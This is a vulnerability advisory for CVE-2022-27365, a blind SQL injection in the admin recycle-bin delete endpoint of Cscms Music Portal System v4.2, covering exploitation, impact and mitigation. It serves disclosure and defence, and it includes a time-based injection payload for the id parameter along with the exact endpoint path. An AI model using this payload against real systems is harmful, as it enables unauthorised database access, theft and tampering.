CVE-2022-27365

Vulnerability

Cscms Music Portal System v4.2 is affected by a blind SQL injection vulnerability in the dance_Dance.php_del component. An authenticated administrator can inject malicious SQL statements into the id parameter during the deletion of dance items (e.g., songs) from the recycle bin. The vulnerability is reachable via a POST request to /admin.php/dance/admin/dance/del with a crafted id value. Versions up to and including v4.2 are affected.

Exploitation

An attacker must possess administrative credentials and be able to log into the backend. After logging in, the attacker navigates to the dance management section and sends a POST request to the delete endpoint (/admin.php/dance/admin/dance/del) with a malicious id parameter. The proof-of-concept shown in reference [1] demonstrates injecting id=7)and(sleep(5))--+ which causes the database to sleep for 5 seconds, confirming blind SQL injection.

Impact

Successful exploitation allows an authenticated admin to execute arbitrary SQL commands, leading to potential data exfiltration, modification, or deletion of the database. Since this is a blind injection, the attacker can retrieve sensitive information character by character. The privilege required is administrative access, but the scope can extend to full database compromise.

Mitigation

No official fix has been released as of the publication date (2022-04-15). The vendor has not responded to the reported issue on the GitHub issue tracker [1]. Until a patch is available, administrators should restrict backend access to trusted users, avoid exposing admin interfaces to the public internet, and monitor database logs for anomalies. The vulnerability is not listed on the CISA KEV catalog.